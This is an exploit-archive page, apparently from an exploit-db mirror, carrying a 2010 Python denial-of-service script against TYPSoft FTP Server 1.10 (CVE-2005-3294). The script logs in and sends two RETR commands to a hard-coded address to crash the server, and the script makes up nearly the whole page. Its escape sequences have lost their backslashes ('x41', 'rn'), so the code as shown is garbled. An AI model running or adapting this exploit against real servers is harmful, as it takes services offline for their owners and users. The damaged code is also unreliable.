TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service
# Published : 2010-12-29
# Author : emgent
# Previous Title : MS10-073 Windows Class Handling Vulnerability
# Next Title : QuickTime Picture Viewer 7.6.6 JP2000 Denial of Service Vulnerability

#!/usr/bin/python
#
# TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service
#
# CVE-2005-3294
# OSVDB 19992
#
# 12/23/2010
# (C) Emanuele Gentili <emgent@backtrack-linux.org>
#
# Notes:
# I have wrote this exploit because the code published here (1) do not work correctly.
# (1) http://www.exploit-db.com/exploits/12604/
#

import socket
import sys

user="test"
pwd="test"
buffer="x41"

print("n TYPSoft FTP Server (V 1.10) RETR CMD Denial Of Servicen")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.109",21))
data = s.recv(1024)
print("[+] Sending user login...")
s.send("USER " + user + 'rn')
data = s.recv(1024)
s.send("PASS " + pwd + 'rn')
data = s.recv(1024)
print("[+] Sending first exploit stage...")
s.send("RETR " + buffer + 'rn')
data = s.recv(1024)
print("[+] Sending second exploit stage...n")
s.send("RETR " + buffer + 'rn')
data = s.recv(1024)
s.close()